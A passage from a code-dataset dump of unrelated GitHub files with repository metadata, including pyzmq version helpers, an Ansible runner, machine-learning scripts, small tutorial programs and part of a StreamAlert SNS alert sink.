created by each triple (p0,p1,p2), perhaps overlapping with points\n#e.g., perhaps color-coding triangles according to whether they have reached equilateral shape\n\n#implement an option in step() method for a different objective, e.g.: step(objective)\n #..whereby the objective is for a point to move to a position where it is equidistant to each of the other two points\n #..therefore it should move to the closest position between itself and the maximal margin hyperspace between the other two points\n\n#it would be great to be able to click on a point and move it during the simulation\n\n#it's possible that random points stopping now and again makes it more likely for equiblibria to be reached\n\n\n'''","repo_name":"trdeca23/moving_triangles","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3243282286","text":"import re\n\nfrom .backend import zmq_version_info\n\n#-----------------------------------------------------------------------------\n# Code\n#-----------------------------------------------------------------------------\n\n__version__ = '13.1.0'\n__revision__ = ''\n\ndef pyzmq_version():\n \"\"\"return the version of pyzmq as a string\"\"\"\n if __revision__:\n return '@'.join([__version__,__revision__[:6]])\n else:\n return __version__\n\ndef pyzmq_version_info():\n \"\"\"return the pyzmq version as a tuple of numbers\n \n If pyzmq is a dev version, the patch-version will be `inf`.\n \n This helps comparison of version tuples in Python 3, where str-int\n comparison is no longer legal for some reason.\n \"\"\"\n parts = re.findall('[0-9]+', __version__)\n parts = [ int(p) for p in parts ]\n if 'dev' in __version__:\n parts.append(float('inf'))\n return tuple(parts)\n\n\ndef zmq_version():\n \"\"\"return the version of libzmq as a string\"\"\"\n return \"%i.%i.%i\" % zmq_version_info()\n\n\n__all__ = ['zmq_version', 'zmq_version_info',\n 'pyzmq_version','pyzmq_version_info',\n '__version__', '__revision__'\n]\n\n","repo_name":"mantidproject/3rdpartylibs-win64","sub_path":"Python27/Lib/site-packages/zmq/sugar/version.py","file_name":"version.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"23108776177","text":"#!/usr/bin/env python\n# from ansible.playbook import Playbook\n# pb = Playbook(playbook='/tmp/ls.yml')\n# pb.run()\n\n\n# run ansible-playbook via subprocess.check_output \n# Later I wish I'll update the calling to python API\n\nimport os\nimport subprocess\nfrom utils import logging\n\nlogger = logging.getLogger(__name__)\n\nPATH = os.path.dirname(os.path.abspath(__file__))\nANSIBLE_CONFIG_PATH=PATH+'/playbook'\n\n\nclass Auth(object):\n\n def __init__(self, inventory=None, playbook=None, log='/tmp/ansible.log'):\n self.inventory = inventory or '/etc/ansible/hosts'\n self.playbook = playbook or '{}/playbook.d/auth.yml'.format(PATH)\n self.ansible_log = log\n\n def run(self):\n cmd = 'ansible-playbook -i {} {}'.format(self.inventory, self.playbook)\n # subprocess.check_output(cmd.split(), stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n logger.info('Run ansible playbook')\n with open(self.ansible_log, 'a') as f:\n os.putenv('ANSIBLE_CONFIG', ANSIBLE_CONFIG_PATH)\n p = subprocess.Popen(cmd.split(), stdout=f, stderr=f)\n # p.communicate()\n # o,e = p.communicate()\n\ndef main():\n a = Auth()\n a.run()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"bismog/ssh-auth","sub_path":"ssh_auth/ssh_auth/set_auth_cmd.py","file_name":"set_auth_cmd.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11617453953","text":"'''Write a tkinter-based program that opens a window with a button and the label.\nThe label should keep track of how many times the button has been clicked.\nFor example, after the user has clicked the button 3 times,\nthe label should say something like \"3 clicks so far.\"\n'''\n\nfrom tkinter import *\n\nclass my_frame(Frame):\n def __init__(self,master):\n Frame.__init__(self,master)\n self.grid()\n self.button = Button(self, text = 'Click me!', command = self.print_message)\n self.button.grid(row = 0, column = 0)\n self.count = 0\n self.click_counter = Label(self, text = \"0 clicks so far!\")\n self.click_counter.grid(row = 1, column = 0)\n\n def print_message(self):\n self.count += 1\n self.click_counter['text'] = f'{self.count} clicks so far!'\n\n\n# create new window and initialize and run the frame\nroot = Tk()\ntnf = my_frame(root)\ntnf.mainloop()","repo_name":"luluowens/AoPS","sub_path":"Week_7/simple_tkinter.py","file_name":"simple_tkinter.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27492376057","text":"import logging\nfrom dataclasses import dataclass\n\nfrom experiments.evaluation.alpino import AlpinoTree\nfrom sklearn.metrics import classification_report\n\nlogger = logging.getLogger(__name__)\n\n\nFOUND = \"Found\"\nNOT_FOUND = \"Not found\"\n\n\n@dataclass\nclass Event:\n \"\"\"Defines an event in terms of token indices over the host sentence. Additionally encodes the head tokens, derived from alpino trees.\"\"\"\n\n tokens: set[int]\n heads: set[int]\n\n\ndef score_micro_average(golds, predictions, alpino_trees):\n \"\"\"Score the performance of `crf` against the gold in each `example`. Return a report of micro-averaged scores as a dict.\n\n This is used to score a single fold in micro-average fashion.\n \"\"\"\n\n # To build the confusion matrix in micro-avg style, build gold and pred vectors.\n # e.g. where gold_vector[0]=FOUND and pred_vector[0]=NOT_FOUND, this represents a false negative on one example.\n gold_vector = []\n pred_vector = []\n for gold, prediction, alpino_tree in zip(golds, predictions, alpino_trees):\n\n # For this evaluation, convert gold y and pred y into `Event` objects.\n\n # There should only be 1 gold event. Assert this.\n gold_events = list(get_events(gold, alpino_tree))\n assert len(gold_events) <= 1\n gold_event = gold_events[0] if gold_events else None\n\n # The CRF was trained with example each containing 1 event, so we expect mostly output with 1 event, but this is not guaranteed.\n # In this evaluation, to conform with the original evaluation, we ignore the significance of having multiple pred events and score only once per example.\n\n pred_events = list(get_events(prediction, alpino_tree))\n\n # Determine whether the gold and pred events match as TP, FP, TN, FN. Add to the vectors accordingly.\n\n # No gold or pred events -> TN\n if not gold_event and not pred_events:\n gold_vector.append(NOT_FOUND)\n pred_vector.append(NOT_FOUND)\n # Pred events BUT no gold event -> FP\n elif not gold_event and pred_events:\n gold_vector.append(NOT_FOUND)\n pred_vector.append(FOUND)\n # Gold event BUT no pred event -> FN\n elif gold_event and not pred_events:\n gold_vector.append(FOUND)\n pred_vector.append(NOT_FOUND)\n # Gold event AND pred event -> TP is there is a fuzzy match, otherwise FN\n else:\n if any(fallback_match(gold_event, p) for p in pred_events):\n gold_vector.append(FOUND)\n pred_vector.append(FOUND)\n else:\n gold_vector.append(FOUND)\n pred_vector.append(NOT_FOUND)\n\n # Report a count of CM categories.\n counts = {\"tp\": 0, \"fp\": 0, \"fn\": 0, \"tn\": 0}\n for g, p in zip(gold_vector, pred_vector):\n if g == p == FOUND:\n counts[\"tp\"] += 1\n elif g == FOUND and p == NOT_FOUND:\n counts[\"fn\"] += 1\n elif g == NOT_FOUND and p == FOUND:\n counts[\"fp\"] += 1\n else:\n counts[\"tn\"] += 1\n logger.info(\n f\"In event level scoring, collected the following CM counts: {counts}\"\n )\n\n report = classification_report(gold_vector, pred_vector, output_dict=True)\n return report\n\n\ndef get_events(sent: list[str], tree: AlpinoTree):\n \"\"\"Find and yield `Event` objects from `sent`. These encode the tokens and head tokens of the event, encoded as integer indices over the sentence tokens.\n\n Use the AlpinoTree to find the head tokens in the sentence.\n\n `sent` is a list of IOB tags, without label information.\n \"\"\"\n\n def get_head_set(event_tokens: list[int], alpino_tree: AlpinoTree):\n \"\"\"Given a list of event tokens (as indices over sentence tokens), yield those indices that also mark head tokens.\"\"\"\n heads = alpino_tree.head_indices\n for token in event_tokens:\n if token in heads:\n yield token\n\n # Sanity checks.\n assert len(sent) > 0, sent\n assert all(tag in {\"I\", \"O\", \"B\"} for tag in sent), sent\n\n current_event = []\n for i, iob_tag in enumerate(sent):\n if iob_tag in {\"I\", \"B\"}:\n current_event.append(i)\n else:\n if len(current_event) > 0:\n heads = get_head_set(current_event, tree)\n event = Event(tokens=set(current_event), heads=set(heads))\n yield event\n current_event = []\n\n\ndef fallback_match(gold: Event, pred: Event):\n \"\"\"Perform fuzzy matching to compare `gold` and `pred` events.\n\n The match is always True if the gold tokens match the pred tokens exactly, and always False if there is no overlap between the tokens of pred and gold.\n\n If neither these conditions pass, perform a fuzzy match on the heads of the events and return True if that check passes.\n\n Else, perform fuzzy match on the tokens of the events and return that conclusion.\n \"\"\"\n\n def dice_coef(s1: set, s2: set) -> float:\n if not isinstance(s1, set) or not isinstance(s2, set):\n raise TypeError(\"Arguments must be sets.\")\n\n if len(s1) + len(s2) == 0:\n return 0\n num = 2.0 * len(s1.intersection(s2))\n den = len(s1) + len(s2)\n return num / den\n\n def fuzzy_match(set1, set2):\n return dice_coef(set1, set2) > 0.8\n\n if gold.tokens == pred.tokens:\n return True\n if len(gold.tokens.intersection(pred.tokens)) == 0:\n return False\n if fuzzy_match(gold.heads, pred.heads):\n return True\n return fuzzy_match(gold.tokens, pred.tokens)\n","repo_name":"Zatteliet/eventdna-exp","sub_path":"experiments/evaluation/event_level.py","file_name":"event_level.py","file_ext":"py","file_size_in_byte":5574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30857151883","text":"def sort_from_minimum_salary(data, reverse_data=False):\n \"\"\"Функция сортировки по минимальной зарплате\"\"\"\n data = sorted(data, reverse=reverse_data)\n return data\n\n\ndef get_top_vacancies(vacancies_list, top_n):\n \"\"\"Функция принимает отсортированный список вакансий и возвращает n-ое количество первых вакансий из списка\"\"\"\n\n top_vacancies = []\n count = 0\n while count < len(vacancies_list):\n top_vacancies.append(vacancies_list[count])\n count = count + 1\n\n return top_vacancies[:top_n]\n\n\n\n\n","repo_name":"Evelinabas0612/cw4","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39134383928","text":"import numpy as np\nimport pandas as pd\nimport lightgbm as lgb\nfrom Devtools.LightGBM.score_cal import Score\n\npd.set_option('display.max_columns', 100)\nimport warnings\nwarnings.filterwarnings('ignore')\n\nseed = 42\ndata_path = '../data/220718-newdata.csv'\ndata = pd.read_csv(data_path)\nfeatures = [\"DEPT\", \"DXC\", \"SPP\", \"TORQUE\", \"FLWPMPS\", \"ROP\", \"RPM\", \"TGAS\", \"WOB\"]\ncols = list(data.columns)\ncols = cols + ['spp_', 'dept_']\ndataset = pd.DataFrame(data=None, columns=cols)\nfor i, well in enumerate(data.WELL.unique()):\n data_ = data[data.WELL==well].sort_values(by='DEPT').reset_index(drop=True)\n data_.loc[:,'spp_'] = data_.loc[:, \"SPP\"] - data_.loc[0, \"SPP\"]\n data_.loc[:, 'dept_'] = data_.loc[:, 'DEPT'] - data_.loc[0, \"DEPT\"]\n dataset = pd.concat([dataset, data_])\nlabel = 'FRACTURE_ZONE'\ndataset = dataset.dropna(subset=[label])\ndataset['torque_per_rpm'] = dataset.loc[:, \"TORQUE\"] / dataset.loc[:, \"RPM\"]\ndataset['rop_per_rpm'] = dataset.loc[:, \"ROP\"] / dataset.loc[:, \"RPM\"]\ndataset['tgas_per_flwpmps'] = dataset.loc[:, \"TGAS\"] / dataset.loc[:, \"FLWPMPS\"]\n#datase[\"spp_per_depth\"] = data.SPP.values / data.DEPT.values\nfeatures = features + [\"spp_\", \"dept_\", \"tgas_per_flwpmps\", \"torque_per_rpm\", \"rop_per_rpm\"]\n# features.remove(\"DEPT\")\n# features.remove(\"SPP\")\n# features.remove(\"TGAS\")\n# features.remove(\"RPM\")\ndataset = dataset.drop(dataset[dataset.RPM==0].index)\nX = dataset[features]\n#X = np.log1p(data[features])\n#X = pd.DataFrame(X, columns=features)\nlabels = dataset[label]\n# print(dataset.head())\n# print(dataset.info())\n# # processing pipeline\n# preprocessors = make_pipeline(IterativeImputer(estimator=ElasticNetCV(max_iter=int(1e6)), random_state=seed),\n# MinMaxScaler(),\n# )\n# split data\n#X_train, X_test, y_train, y_test = train_test_split(X, labels, train_size=0.9, random_state=seed, #shuffle=True, stratify=labels)\n#X_train, X_test = preprocessors.fit_transform(X_train), preprocessors.transform(X_test)\n# set scoring\nscoring='f1_weighted'\n#model = Train_LGBMC(\n# features=X_train,\n# labels=y_train,\n# iterations=100,\n# scoring=scoring,\n# base_score=0.83, # applied when objective is 1 (train_test_drop)\n# validation_size=0.1,\n# objectives=0, #{0: \"valid_score\", 1: \"train_test_drop\"}\n# favor_class=1, #{0: \"min false negative\", 1: \"min false positive\", 2: \"balanced\"}\n# show_shap=True, # flag to show shap True or False\n# )\n\nmodel = lgb.Booster(model_file='../saved_models/lgb_model.json')\n# model = lgb.Booster(model_file='../saved_models/lgb_model_no_dept_v0.1.1.json')\nfrom sklearn.metrics import ConfusionMatrixDisplay, confusion_matrix\nimport matplotlib.pyplot as plt\nimport time\nfor well in dataset.WELL.unique():\n test_ = dataset[dataset.WELL==well]\n X = test_[features]\n y = test_[label]\n y_pred=model.predict(X) >= 0.5\n test_['prediction'] = y_pred.astype(int)\n test_=test_.drop(columns=[\"spp_\", \"dept_\", \"tgas_per_flwpmps\", \"torque_per_rpm\", \"rop_per_rpm\"])\n test_.to_csv(f'../Study_results/{time.time()}prediction_{well}_no_dept.csv')\n score = Score(y_true=y, y_pred=y_pred, scoring=scoring, favor_class=1)\n print(f\"Score of {well}: {score}\")\n\n # y_pred_full = model.predict(X) >=0.5\n conf_ = confusion_matrix(y, y_pred)\n confd_ = ConfusionMatrixDisplay(conf_)\n confd_.plot()\n plt.title(f'Confusion matrix of {well}')\n plt.savefig(f'../imgs/confusion-matrix-wells/{time.time()}_well_cm_no_dept.png')\n plt.show();","repo_name":"sonnt-dna/API_Fracture","sub_path":"src/app/service/library/Devtools/Regression/Main_LightGBM_8_09_2022.py","file_name":"Main_LightGBM_8_09_2022.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23233818135","text":"# This has a ML application to separate IRIS dataset based on four\n# features, Petal lenght, petal width, sepal length and sepal width\n# This program separates setosa flower with non-setosa flowers\n# Reference book: Build Maching learning Systems with Python, Richert Coelho\n# Chapter 2.\n\nimport matplotlib.pyplot as plt\nimport sklearn.datasets as dataset\nimport numpy as np\n\n# We load the data with load_iris from sklearn\n\ndata = dataset.load_iris()\nprint(\"data type:\", type(data) )\nfeatures = data['data']\nfeature_names = data['feature_names']\ntarget = data['target']\ntarget_names = data['target_names']\n\nprint('Dimensions: ', features.shape)\nslength = features[:,0]\nswidth = features[:,1]\nplength = features[:,2]\npwidth = features[:,3]\nprint('Feature names : ', feature_names)\nfor t, marker,c in zip(np.arange(3), \">ox\", \"rgb\"):\n # we plot each class on it own to get different \n # colored markers\n plt.scatter(features[target==t,2],\n features[target==t,3],\n marker=marker, c=c)\n\n\n\nlabels = target_names[target]\n# use numpy operastion to get setosa features\nis_setosa = (labels =='setosa')\n\nprint('feature_names:', labels.shape)\n\nmax_setosa = plength[is_setosa].max()\nmin_non_setosa = plength[~is_setosa].min()\n\nprint('Maximum of setosa:', (max_setosa))\nprint('Minimum of others:', (min_non_setosa))\n\n\n#if features [:,2]<2: print ('Setosa')\n#if (plength < 2): print ('Setosa')\npred = (plength<2)\n\n# count the number of Setosa labels\nsetosa_count = np.count_nonzero(pred)\nprint ('Number of setosa: ', setosa_count)\nsz = np.size(pred)-setosa_count\nprint('Number of non-setosa: ', (np.size(pred)-setosa_count))\n\n\n ","repo_name":"kushal177/hobbyProjects","sub_path":"PythonTrainingMaterial/training_5.py","file_name":"training_5.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2655899261","text":"from typing import List\n\n\nclass Solution:\n def findPeakElement(self, nums: List[int]) -> int:\n \"\"\"\n Key element is is that all values in nums are different from their neighbor.\n\n Runtime: 58 ms, faster than 64.17% of Python3 online submissions for Find Peak Element.\n Memory Usage: 14 MB, less than 91.06% of Python3 online submissions for Find Peak Element.\n \"\"\"\n if len(nums) == 1:\n return 0\n\n left = 0\n right = len(nums) - 1\n\n while 0 <= left <= right <= len(nums) - 1:\n mid = (left + right) // 2\n\n if mid == 0 and nums[mid] > nums[mid + 1]:\n return mid\n elif mid == len(nums) - 1 and nums[mid] > nums[mid - 1]:\n return mid\n elif nums[mid] > nums[mid - 1] and nums[mid] > nums[mid + 1]:\n return mid\n elif nums[mid] < nums[mid + 1]:\n left = mid + 1\n else:\n right = mid - 1\n\n return -1\n","repo_name":"IAjimi/Leetcode","sub_path":"162_Find_Peak_Element.py","file_name":"162_Find_Peak_Element.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40497487626","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: ZyVerus\n\nDescription: This program provides an output of states with their\nassociated capitals, flowers, and population.\n\nThird party library utilized using a separate Anaconda environment in Visual Studio 2019.\n\nThird party libraries:\nmatplotlib\nPIL (Python Imaging Library)\n\n\"\"\"\n\nimport os\nimport sys\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as mticker\nfrom PIL import Image\nimport states_data as states\n\n# Algorithm Termination Value\nSENTINEL = \"0\"\n\ndef main():\n \"\"\" main function \"\"\"\n # CLI Menu\n menu(\"init_run\")\n while True:\n menu(\"prompts\")\n inp = input(\"\\n> \").strip()\n menu(\"sl\")\n # Switch\n # Display all States\n if inp == '1':\n for i in states.states:\n show_state(i, False)\n # Search for a state\n elif inp == '2':\n state = get_state()\n if state:\n show_state(state, True)\n # Display Top 5 Populated States\n elif inp == '3':\n show_top_population()\n # Update a state's population\n elif inp == '4':\n update_population()\n # Exit Program\n elif inp == '0':\n menu(\"exit\")\n sys.exit(0)\n else:\n menu(\"invalid\")\n\ndef show_state(state, specific):\n \"\"\" Show State Information \"\"\"\n # Set population value to integer\n pop_value = int(states.states[state][\"Population\"])\n print(\"State:\\t\\t\", state)\n print(\"Capital:\\t\", states.states[state][\"Capital\"])\n print(\"Flower:\\t\\t\", states.states[state][\"Flower\"])\n print(\"Population:\\t {:,}\".format(pop_value))\n menu(\"sl\")\n\n # Show Flower Picture if a specific State was selected\n if specific:\n # / for filepath used for interoperability between different Operating Systems.\n image_path = os.path.join(sys.path[0] + \"/Flowers/\" + state + \".jpg\")\n print(\"ALERT:\\nOpening File: \" + image_path + \" ...\\n\")\n image = Image.open(image_path)\n image.show()\n\ndef get_state():\n \"\"\" Requests user to specify a state they would like to display \"\"\"\n state = \"\"\n menu(\"back\")\n print(\"Please enter a State:\")\n while not state:\n inp = input(\"\\n> \").strip()\n menu(\"sl\")\n # Check for Sentinel Value\n if inp == SENTINEL:\n break\n # Input Validation\n fix_inp = \"\"\n # Check to see if input only contains alphabetical characters (ignores spaces)\n if inp.replace(\" \", \"\").isalpha():\n # Split input string value into separate a list\n # split() uses whitespace as the default separator\n word_list = inp.split()\n # Check each word\n for i in word_list:\n # Capitalizes the first letter in each word\n fix_inp += i.capitalize() + \" \"\n # Strip the fixed input of any spaces at the end of the string\n fix_inp = fix_inp.strip()\n # Check for fixed input value in States dictionary\n if fix_inp in states.states.keys():\n state = fix_inp\n else:\n print(\"ERROR: Please enter a valid State.\")\n\n return state\n\ndef show_top_population():\n \"\"\" Shows the states with the highest population in descending order \"\"\"\n # Get state populations listed in descending order\n populations = sorted(\n states.states.keys(), key=lambda key_: int(\n states.states[key_][\"Population\"]\n ), reverse=True\n )\n\n # Keep only first five top items\n populations = populations[:5]\n pop_list = []\n print(\"Top 5 Populated States (Descending Order):\\n\")\n # Output List\n for i in populations:\n pop_value = int(states.states[i][\"Population\"])\n print(i + \": {:,}\".format(pop_value))\n pop_list.append(pop_value)\n\n menu(\"sl\")\n # Plot Data\n plt.bar(populations, pop_list,)\n # Get Y Values in the Bar Graph\n y_values = plt.gca().get_yticks()\n # Set Labels Format to show Commas for Thousandths place\n label_format = \"{:,.0f}\"\n # Set FixedLocator to suppress FixedFormatter UserWarning\n plt.gca().yaxis.set_major_locator(mticker.FixedLocator(y_values))\n # Set Y Values (Labels)\n plt.gca().set_yticklabels([label_format.format(i) for i in y_values])\n # Create X Label\n plt.xlabel(\"States\", fontsize=12)\n # Create Bar Title\n plt.title(\"Top 5 Populated States (Bar):\")\n # Display Bar Graph to User\n plt.show()\n\ndef update_population():\n \"\"\" Function to update state population based on User's input \"\"\"\n # Nested Function\n def inp_population():\n \"\"\" Validate that user input is an integer \"\"\"\n value = \"\"\n while not value:\n print(\"Please enter the new population value:\")\n inp = input(\"\\n> \").strip()\n menu(\"sl\")\n\n # Check for Sentinel Value\n if inp == SENTINEL:\n break\n # Input Validation\n if int_val(inp):\n if int(inp) > 0:\n value = inp\n else:\n print(\"ERROR: Population can not be 0 or a negative value.\\n\")\n else:\n print(\"ERROR: Population must be a number with a value of 1 or greater\\n\")\n return value\n\n # Nested Function\n def set_population(state, population):\n \"\"\" Set the value of the data in states_data.py dictonary \"\"\"\n\n states.states[state][\"Population\"] = population\n print(\"Population of \" + state + \" set to \" + population + \"\\n\")\n #else:\n #print(\"ERROR: State could not be found.\")\n\n # Prompt for state input and run nested functions\n #print(\"Please enter the State you would like to update.\")\n #menu(\"back\")\n state = get_state()\n if state:\n value = inp_population()\n if value:\n set_population(state, value)\n\ndef menu(option):\n \"\"\" used for displaying the menu in the CLI \"\"\"\n intro = \"Welcome to the Python State Capital and Flower List Application.\\n\"\n closing = (\n \"Thank you for using the State Capital and Flower List Application.\"\n + \"\\nPress ENTER to close this console.\"\n )\n prompts = (\n \"Please choose an option below:\" \\\n + \"\\n1 - Display all States in alphabetical order with their respective\" \\\n + \" Capital, Population, and Flower.\" \\\n + \"\\n2 - Search for a specific state and display its respective Capital,\" \\\n + \" Population, and Flower (with image).\" \\\n + \"\\n3 - Display a bar graph of the 5 most populated states and their\" \\\n + \" overall population.\" \\\n + \"\\n4 - Update the overall state population for a specific state.\" \\\n + \"\\n0 - Exit Application.\"\n )\n invalid = \"ERROR: Invalid Selection. Please select from 1 - 4 of the menu\" \\\n + \" options, or '0' to exit.\\n\"\n back = \"BACK: Input '0' at any point to return to the main menu.\"\n\n if option == \"init_run\":\n print(intro)\n elif option == \"prompts\":\n print(prompts)\n elif option == \"invalid\":\n print(invalid)\n elif option == \"back\":\n print(back)\n elif option == \"proceed\":\n input(\"Press ENTER to proceed...\")\n elif option == \"sl\":\n print(\"\")\n elif option == \"exit\":\n print(closing)\n\n# Integer Input Validation\ndef int_val(inp):\n \"\"\" Input validation to test for integer value \"\"\"\n is_int = False\n try:\n int(inp)\n is_int = True\n except ValueError:\n is_int = False\n return is_int\n\n# Execute main function\nmain()\n","repo_name":"ZyVerus/Academic-Projects","sub_path":"Python/Secure Development/State Information Application/states_information.py","file_name":"states_information.py","file_ext":"py","file_size_in_byte":7603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29105205820","text":"class Library:\n def __init__(self, listOfBooks):\n self.books = listOfBooks\n\n # Display all available books\n def displayAvailableBooks(self):\n print(\"\\nBooks Present in this Library are : \")\n for book in self.books:\n print('\\t' + book)\n\n # Borrow Book from Library\n def borrowBook(self, bookName):\n if bookName in self.books:\n print(f\"\\nYou Have been Issued {bookName}. Please Keep it safe and return it with in 14 days\")\n self.books.remove(bookName)\n return True\n\n else:\n print(\"\\n Sorry This Book is Not Available in The Library\")\n return False\n\n # Return Book to Library\n def returnBook(self, bookName):\n self.books.append(bookName)\n print(\"\\nThanks for Returning this Book\") \n\nclass Student:\n\n # Request Book \n def requestBook(self):\n self.book = input(\"\\nEnter Name of the Book you Want to Borrow : \")\n return self.book\n\n # Return Book or Add a new Book to the Library\n def returnBook(self):\n self.book = input(\"\\nEnter Name of the Book you Want to Return : \")\n return self.book\n\nif __name__ == \"__main__\":\n centralLibrary = Library([\"Algorithms\", \"Django\", \"Clrs\", \"Python Notes\"])\n # centralLibrary.displayAvailableBooks()\n s1 = Student()\n while (1):\n welcomeMsg = '''\\n=====Welcome to Central Library=====. \n Please Choose an Option\n 1. Listing all the Book\n 2. Request a book\n 3. Add/Return a Book\n 4. Exit the Library\n '''\n print(welcomeMsg)\n a = int(input(\"Enter a Choice : \"))\n if a == 1:\n centralLibrary.displayAvailableBooks()\n\n elif a == 2:\n bookname = s1.requestBook()\n centralLibrary.borrowBook(bookname)\n \n\n elif a == 3:\n bookname = s1.returnBook()\n centralLibrary.returnBook(bookname)\n\n elif a == 4:\n print(\"Thank You for Using the Library\")\n input()\n exit()\n\n else:\n print(\"Invalid Choice\")","repo_name":"gorakh999/Library-Management-System","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20544993752","text":"#!/usr/bin/python\n\n# -*- coding: utf-8 -*-\n\n'''\n@author: Gonzalo Rivero\n@date Sat Nov 8 19:23:57 PST 2014\nTwo-state model\n'''\n\nimport pandas as pd\nimport psycopg2 as pg\nimport numpy as np\nimport pymc as pm\nimport theano as T\n\nconn = pg.connect(database='lastfm', \n host='127.0.01',\n user='gonzalorivero', \n password='root', \n port='5432')\n\n\ncur = conn.cursor()\nf = open('tagdata.sql', 'r')\ncur.execute(f.read())\ntagdata = cur.fetchall()\ncolnames = [desc[0] for desc in cur.description]\ntagdata = pd.DataFrame(tagdata, columns=colnames)\n\ntagdata['prop'] = tagdata.groupby(tagdata.day).counts.apply(lambda x: x/np.sum(x))\n\nsels = tagdata.groupby(tagdata.tag).prop.max() \nsels = sels.index[sels > .25].tolist()\ntagdata = tagdata[tagdata.tag.map(lambda x: x in sels)]\n\ntagdata = tagdata.groupby(tagdata.day).apply(lambda x: x.groupby(tagdata.tag).sum())\ntagdata.reset_index(level=[0,1], inplace=True)\n\nfulldist = pd.DataFrame({'tag':list(set(tagdata.tag)) * len(set(tagdata.day)), \n 'day':list(set(tagdata.day)) * len(set(tagdata.tag))})\n\nfulldist = pd.merge(fulldist, tagdata, on=['day', 'tag'], how='outer')\nfulldist.loc[np.isnan(fulldist.prop), \"prop\"] = 0\nfulldist.loc[np.isnan(fulldist.counts), \"counts\"] = 0\n\n# fulldist = fulldist.iloc[0:100]\nmtag = [list(fulldist.loc[fulldist.day == i, \"prop\"]) for i in set(fulldist.day)]\nday = list(set(fulldist.day))\n\n\nwith pm.Model() as per_model:\n ''' Model underlying states '''\n state = pm.Bernoulli('state', p=0.5, shape=len(day))\n\n # Parameters\n alpha = pm.Normal('alpha', mu=0, tau=1E-3, shape=len(mtag[0]))\n beta = pm.Normal('beta', mu=0, tau=1E-3, shape=len(mtag[0]))\n \n ## Softmax\n def invlogit(x):\n return T.tensor.nnet.softmax(x)\n\n theta = np.empty(len(day), object)\n p_vec = np.empty(len(day), object)\n track_lk = np.empty(len(day), object)\n\n ## empty theta\n for i, j in enumerate(day):\n theta[i] = alpha + T.dot(state[i], beta.T)\n p_vec[i] = invlogit(theta[i])\n\n # Data likelihood\n track_lk[i] = pm.Dirichlet('track_lk',\n a=p_vec[i], shape=len(mtag[0]),\n observed=mtag[i])\n \nwith per_model:\n # start = pm.find_MAP()\n step = pm.Metropolis()\n nsteps = 1000\n trace = pm.sample(nsteps, step)\n","repo_name":"griverorz/lastfm","sub_path":"src/datamodel.py","file_name":"datamodel.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73027833013","text":"import base64\nimport collections\nimport json\nimport logging\nimport sys\n\nimport boto3\nimport botocore\n\nlogging.basicConfig()\nlogger = logging.getLogger('StreamAlert')\n\nclass SNSMessageSizeError(Exception):\n pass\n\nclass StreamSink(object):\n def __init__(self, alerts, config, env):\n self.alerts = alerts\n self.env = env\n self.variables = config['variables']\n\n def sink(self):\n \"\"\"Sink triggered alerts from the StreamRules engine.\n\n Group alerts to be sent to each sink, verifies that the\n sink exists in our configuration, and then sinks each\n group of alerts to the given SNS topic.\n\n Sends a message to SNS with the following JSON format:\n default: 'default',\n alerts: [\n 'rule_name': 'name',\n 'outputs': ['output1', 'output2'],\n 'payload': 'message_payload'\n ]\n \"\"\"\n def jdefault(obj):\n \"\"\"Helper method for marshalling custom objects to JSON\"\"\"\n return obj.__dict__\n\n snsDict = {'default': 'default', 'alerts': self.alerts}\n snsJsonMessage = json.dumps(snsDict, default=jdefault)\n encodedSnsMessage = base64.b64encode(snsJsonMessage)\n\n lambda_alias = self.env['lambda_alias']\n\n if lambda_alias == 'production':\n topic_arn = self._get_sns_topic_arn()\n client = boto3.client('sns', region_name=self.env['lambda_region'])\n self.publish_message(client, encodedSnsMessage, topic_arn)\n elif lambda_alias == 'staging':\n logger.info(json.dumps(snsDict, indent=2, default=jdefault))\n\n def _get_sns_topic_arn(self):\n \"\"\"Return a properly formatted SNS ARN.\n\n Args:\n region: Which AWS region the SNS topic exists in.\n topic: The name of the SNS topic.\n \"\"\"\n topic = '{}_monitoring'.format(self.env['lambda_function_name'])\n return 'arn:aws:sns:{region}:{account_id}:{topic}'.format(\n region=self.env['lambda_region'],\n account_id=self.env['account_id'],\n topic=topic\n )\n\n @staticmethod\n def _sns_message_size_check(message):\n \"\"\"Verify the SNS message is less than or equal to 256KB (SNS Limit)\n Args:\n message: A base64 encoded string of alerts to send to SNS.\n\n Returns:\n Boolean result of if the message is within the size constraint\n \"\"\"\n messageSize = float(sys.getsizeof(message)) / 1024\n return 0 < messageSize <= 256.0\n\n def publish_message(self, client, message, topic):\n \"\"\"Emit a message to SNS.\n\n Args:\n client: The boto3 client object.\n message: A JSON string containing all serialized alerts.\n 